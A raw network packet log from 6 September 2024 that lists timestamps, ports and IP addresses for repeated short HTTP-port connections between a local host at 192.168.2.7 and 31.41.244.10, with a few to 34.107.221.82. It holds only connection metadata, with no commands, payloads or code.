Sep 6, 2024 09:59:48.756721973 CEST	80	51327	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:48.756839037 CEST	51327	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:48.757159948 CEST	51327	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:48.761933088 CEST	80	51327	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:49.473978996 CEST	80	51327	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:49.474123955 CEST	51327	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:49.477431059 CEST	51327	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:49.477730036 CEST	51328	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:49.482888937 CEST	80	51328	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:49.482983112 CEST	51328	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:49.483011961 CEST	80	51327	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:49.483076096 CEST	51327	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:49.483397007 CEST	51328	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:49.488241911 CEST	80	51328	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:50.448544025 CEST	80	51328	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:50.448651075 CEST	80	51328	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:50.448856115 CEST	51328	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:50.570261955 CEST	51328	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:50.570569038 CEST	51329	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:50.575526953 CEST	80	51328	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:50.575850964 CEST	80	51329	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:50.577264071 CEST	51328	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:50.577382088 CEST	51329	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:50.577950954 CEST	51329	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:50.582743883 CEST	80	51329	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:51.283593893 CEST	80	51329	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:51.283736944 CEST	51329	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:51.288075924 CEST	51329	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:51.288290024 CEST	51330	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:51.293085098 CEST	80	51330	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:51.293169022 CEST	80	51329	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:51.293401957 CEST	51329	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:51.293442011 CEST	51330	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:51.293770075 CEST	51330	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:51.298508883 CEST	80	51330	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:51.995857954 CEST	80	51330	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:51.995932102 CEST	51330	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.105273962 CEST	51330	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.105556011 CEST	51331	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.110658884 CEST	80	51331	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:52.110945940 CEST	80	51330	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:52.111047029 CEST	51330	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.111061096 CEST	51331	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.111232042 CEST	51331	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.118093014 CEST	80	51331	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:52.836570024 CEST	80	51331	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:52.836719036 CEST	51331	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.840830088 CEST	51331	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.841144085 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.846000910 CEST	80	51332	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:52.846059084 CEST	80	51331	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:52.846093893 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.846117973 CEST	51331	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.846514940 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:52.851253033 CEST	80	51332	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:53.750032902 CEST	80	51332	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:53.750164032 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.751279116 CEST	80	51332	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:53.751562119 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.870749950 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.871074915 CEST	51333	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.876224995 CEST	80	51332	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:53.876240969 CEST	80	51333	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:53.876326084 CEST	51332	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.876338959 CEST	51333	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.876617908 CEST	51333	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:53.881423950 CEST	80	51333	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:54.589832067 CEST	80	51333	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:54.590039968 CEST	51333	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:54.593544960 CEST	51333	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:54.593849897 CEST	51334	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:54.598896980 CEST	80	51333	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:54.598958015 CEST	51333	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:54.599150896 CEST	80	51334	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:54.599252939 CEST	51334	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:54.599504948 CEST	51334	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:54.604397058 CEST	80	51334	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:55.338376999 CEST	80	51334	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:55.338453054 CEST	51334	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:55.454979897 CEST	51334	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:55.455302000 CEST	51335	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:55.460987091 CEST	80	51334	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:55.461069107 CEST	80	51335	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:55.461107969 CEST	51334	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:55.461266994 CEST	51335	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:55.461519003 CEST	51335	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:55.466989040 CEST	80	51335	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:56.280478954 CEST	80	51335	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:56.280658960 CEST	51335	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:56.283350945 CEST	51335	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:56.283729076 CEST	51336	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:56.288608074 CEST	80	51336	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:56.288968086 CEST	51336	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:56.289172888 CEST	51336	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:56.289793968 CEST	80	51335	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:56.289885044 CEST	51335	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:56.293956041 CEST	80	51336	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.011801958 CEST	80	51336	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.012145996 CEST	51336	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.125880957 CEST	51336	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.126264095 CEST	51337	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.131100893 CEST	80	51336	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.131112099 CEST	80	51337	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.131241083 CEST	51337	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.131310940 CEST	51336	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.131694078 CEST	51337	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.136431932 CEST	80	51337	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.777081966 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:57.784142017 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:57.849656105 CEST	80	51337	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.849730968 CEST	51337	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.853621960 CEST	51337	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.853935003 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.860956907 CEST	80	51338	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.861079931 CEST	80	51337	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.861088037 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.861357927 CEST	51337	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.861357927 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:57.869836092 CEST	80	51338	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:57.974425077 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:57.979407072 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:58.787648916 CEST	80	51338	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:58.787759066 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.791210890 CEST	80	51338	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:58.791367054 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.896872044 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.896888018 CEST	51339	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.901844978 CEST	80	51339	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:58.902268887 CEST	80	51338	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:58.902395010 CEST	51339	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.902395964 CEST	51338	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.902544975 CEST	51339	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:58.907476902 CEST	80	51339	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:59.642291069 CEST	80	51339	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:59.644666910 CEST	51339	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:59.647924900 CEST	51339	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:59.648227930 CEST	51340	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:59.652946949 CEST	80	51339	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:59.653014898 CEST	51339	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:59.653045893 CEST	80	51340	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:59.653134108 CEST	51340	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:59.653373957 CEST	51340	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:59.658147097 CEST	80	51340	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:00.349045992 CEST	80	51340	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:00.352710009 CEST	51340	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:00.462641954 CEST	51340	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:00.462649107 CEST	51341	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:00.467578888 CEST	80	51341	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:00.467720032 CEST	51341	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:00.467909098 CEST	51341	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:00.467953920 CEST	80	51340	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:00.468045950 CEST	51340	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:00.472691059 CEST	80	51341	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:01.219058037 CEST	80	51341	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:01.219189882 CEST	51341	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:01.222146988 CEST	51341	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:01.222528934 CEST	51342	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:01.227627993 CEST	80	51342	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:01.227828979 CEST	51342	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:01.228362083 CEST	80	51341	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:01.228435040 CEST	51342	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:01.228559971 CEST	51341	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:01.233221054 CEST	80	51342	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:01.944967031 CEST	80	51342	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:01.945322037 CEST	51342	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.067456961 CEST	51342	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.067773104 CEST	51344	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.072792053 CEST	80	51342	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:02.072807074 CEST	80	51344	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:02.072906971 CEST	51342	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.072959900 CEST	51344	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.073512077 CEST	51344	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.078564882 CEST	80	51344	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:02.788177013 CEST	80	51344	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:02.788395882 CEST	51344	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.792124033 CEST	51344	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.792125940 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.797069073 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:02.797225952 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.797419071 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.798183918 CEST	80	51344	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:02.798304081 CEST	51344	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:02.802236080 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.445363045 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.445688963 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.448385954 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.448429108 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.448446035 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.448497057 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.448514938 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.448514938 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.569736958 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.570061922 CEST	51346	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.574913025 CEST	80	51345	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.574939013 CEST	80	51346	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:04.577516079 CEST	51345	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.577547073 CEST	51346	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.577699900 CEST	51346	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:04.582626104 CEST	80	51346	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:05.270282984 CEST	80	51346	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:05.270375013 CEST	51346	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:05.274441957 CEST	51346	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:05.274729013 CEST	51347	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:05.279553890 CEST	80	51346	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:05.279567957 CEST	80	51347	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:05.279649019 CEST	51346	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:05.279680967 CEST	51347	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:05.280108929 CEST	51347	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:05.284893036 CEST	80	51347	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:05.997570992 CEST	80	51347	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:05.997663021 CEST	51347	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.125498056 CEST	51347	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.125808954 CEST	51348	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.130646944 CEST	80	51348	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:06.130721092 CEST	80	51347	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:06.130740881 CEST	51348	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.130781889 CEST	51347	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.131031990 CEST	51348	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.135751963 CEST	80	51348	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:06.826986074 CEST	80	51348	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:06.827188969 CEST	51348	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.830984116 CEST	51348	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.830986977 CEST	51349	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.835858107 CEST	80	51349	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:06.836033106 CEST	80	51348	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:06.839104891 CEST	51349	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.839107037 CEST	51348	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.839437008 CEST	51349	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:06.844228983 CEST	80	51349	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:07.877926111 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:07.908200979 CEST	80	51349	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:07.908257008 CEST	80	51349	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:07.908318043 CEST	51349	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:07.910320997 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:08.021991014 CEST	51349	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.022347927 CEST	51350	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.027149916 CEST	80	51350	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:08.027251005 CEST	80	51349	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:08.029270887 CEST	51349	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.029270887 CEST	51350	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.029515028 CEST	51350	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.034554958 CEST	80	51350	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:08.079339981 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:08.084197998 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:08.724905014 CEST	80	51350	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:08.727510929 CEST	51350	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.730287075 CEST	51350	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.730669022 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.735385895 CEST	80	51350	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:08.735505104 CEST	51350	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.735582113 CEST	80	51351	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:08.735718012 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.735969067 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:08.740771055 CEST	80	51351	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.117835999 CEST	80	51351	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.117928028 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.117973089 CEST	80	51351	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.118050098 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.118180990 CEST	80	51351	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.118290901 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.241607904 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.241945028 CEST	51352	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.246726990 CEST	80	51352	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.246788025 CEST	80	51351	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.247282028 CEST	51351	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.247297049 CEST	51352	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.247601032 CEST	51352	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.252415895 CEST	80	51352	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.936856985 CEST	80	51352	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.937300920 CEST	51352	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.940212965 CEST	51352	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.940502882 CEST	51353	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.945353031 CEST	80	51353	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.946363926 CEST	80	51352	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:10.947169065 CEST	51353	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.947170973 CEST	51352	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.947312117 CEST	51353	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:10.952076912 CEST	80	51353	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:11.657363892 CEST	80	51353	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:11.657439947 CEST	51353	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:11.766006947 CEST	51353	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:11.766333103 CEST	51354	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:11.771244049 CEST	80	51353	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:11.771271944 CEST	80	51354	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:11.771465063 CEST	51353	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:11.771511078 CEST	51354	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:11.771656990 CEST	51354	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:11.776453018 CEST	80	51354	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:12.485487938 CEST	80	51354	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:12.489765882 CEST	51354	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:12.489765882 CEST	51354	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:12.490554094 CEST	51355	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:12.494856119 CEST	80	51354	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:12.495326996 CEST	80	51355	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:12.497314930 CEST	51354	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:12.497525930 CEST	51355	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:12.502656937 CEST	51355	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:12.507510900 CEST	80	51355	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:13.201971054 CEST	80	51355	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:13.211499929 CEST	51355	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:13.342777967 CEST	51355	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:13.343509912 CEST	51356	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:13.347824097 CEST	80	51355	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:13.347950935 CEST	51355	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:13.348403931 CEST	80	51356	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:13.348499060 CEST	51356	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:13.348736048 CEST	51356	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:13.353472948 CEST	80	51356	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.042071104 CEST	80	51356	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.057261944 CEST	51356	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.060857058 CEST	51356	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.061158895 CEST	51357	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.065908909 CEST	80	51356	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.065972090 CEST	80	51357	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.068578959 CEST	51356	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.068599939 CEST	51357	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.069536924 CEST	51357	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.074268103 CEST	80	51357	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.773997068 CEST	80	51357	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.774121046 CEST	51357	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.892976999 CEST	51357	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.893239021 CEST	51358	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.898056984 CEST	80	51358	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.898072958 CEST	80	51357	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:14.898168087 CEST	51358	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.898168087 CEST	51357	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.899785042 CEST	51358	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:14.904552937 CEST	80	51358	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:15.591226101 CEST	80	51358	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:15.591341972 CEST	51358	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:15.600892067 CEST	51358	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:15.601227999 CEST	51359	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:15.606055021 CEST	80	51358	31.41.244.10	192.168.2.7
